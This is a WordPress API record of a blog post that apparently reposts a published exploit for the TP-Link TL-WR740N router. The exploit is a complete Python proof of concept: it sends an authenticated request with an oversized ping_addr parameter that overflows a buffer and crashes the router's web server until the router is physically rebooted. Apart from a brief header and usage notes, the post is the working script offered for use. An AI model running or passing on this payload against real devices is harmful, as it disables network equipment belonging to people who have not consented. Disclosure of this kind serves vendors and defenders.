{"id":55295,"date":"2024-03-11T20:09:38","date_gmt":"2024-03-11T17:09:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177515\/tplinktlwr740n-overflowdos.txt"},"modified":"2024-03-12T10:57:37","modified_gmt":"2024-03-12T07:27:37","slug":"tp-link-tl-wr740n-buffer-overflow-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/tp-link-tl-wr740n-buffer-overflow-denial-of-service\/","title":{"rendered":"TP-Link TL-WR740N Buffer Overflow \/ Denial Of Service"},"content":{"rendered":"<p># Exploit Title: TP-Link TL-WR740N &#8211; Buffer Overflow &#8216;DOS&#8217;<br \/>\n# Date: 8\/12\/2023<br \/>\n# Exploit Author: Anish Feroz (ZEROXINN)<br \/>\n# Vendor Homepage: http:\/\/www.tp-link.com<br \/>\n# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br \/>\n# Tested on: TP-Link TL-WR740N<\/p>\n<p>#Description:<\/p>\n<p>#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.<\/p>\n<p>#Usage:<\/p>\n<p>#python3 target username password<br \/>\n#change port, if required<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;POC&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>#!\/usr\/bin\/python<\/p>\n<p>import requests<br \/>\nfrom requests.auth import HTTPBasicAuth<br \/>\nimport base64<\/p>\n<p>def send_request(ip, username, password):<br \/>\nauth_url = f&#8221;http:\/\/{ip}:8082&#8243;<br \/>\ntarget_url = f&#8221;http:\/\/{ip}:8082\/userRpm\/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&amp;doType=ping&amp;isNew=new&amp;sendNum=4&amp;pSize=64&amp;overTime=800&amp;trHops=20&#8243;<\/p>\n<p>credentials = f&#8221;{username}:{password}&#8221;<br \/>\nencoded_credentials = base64.b64encode(credentials.encode()).decode()<\/p>\n<p>headers = {<br \/>\n&#8220;Host&#8221;: f&#8221;{ip}:8082&#8243;,<br \/>\n&#8220;Authorization&#8221;: f&#8221;Basic {encoded_credentials}&#8221;,<br \/>\n&#8220;Upgrade-Insecure-Requests&#8221;: &#8220;1&#8221;,<br \/>\n&#8220;User-Agent&#8221;: &#8220;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36&#8221;,<br \/>\n&#8220;Accept&#8221;: &#8220;text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9&#8221;,<br \/>\n&#8220;Referer&#8221;: f&#8221;http:\/\/{ip}:8082\/userRpm\/DiagnosticRpm.htm&#8221;,<br \/>\n&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate&#8221;,<br \/>\n&#8220;Accept-Language&#8221;: &#8220;en-US,en;q=0.9&#8221;,<br \/>\n&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>\n}<\/p>\n<p>session = requests.Session()<\/p>\n<p>response = session.get(target_url, headers=headers)<\/p>\n<p>if response.status_code == 200:<br \/>\nprint(&#8220;Server Crashed&#8221;)<br \/>\nprint(response.text)<br \/>\nelse:<br \/>\nprint(f&#8221;Script Completed with status code {response.status_code}&#8221;)<\/p>\n<p>ip_address = input(&#8220;Enter IP address of the host: &#8220;)<br \/>\nusername = input(&#8220;Enter username: &#8220;)<br \/>\npassword = input(&#8220;Enter password: &#8220;)<\/p>\n<p>send_request(ip_address, username, password)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: TP-Link TL-WR740N &#8211; Buffer Overflow &#8216;DOS&#8217; # Date: 8\/12\/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http:\/\/www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55295","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55295"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295\/revisions"}],"predecessor-version":[{"id":55298,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55295\/revisions\/55298"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}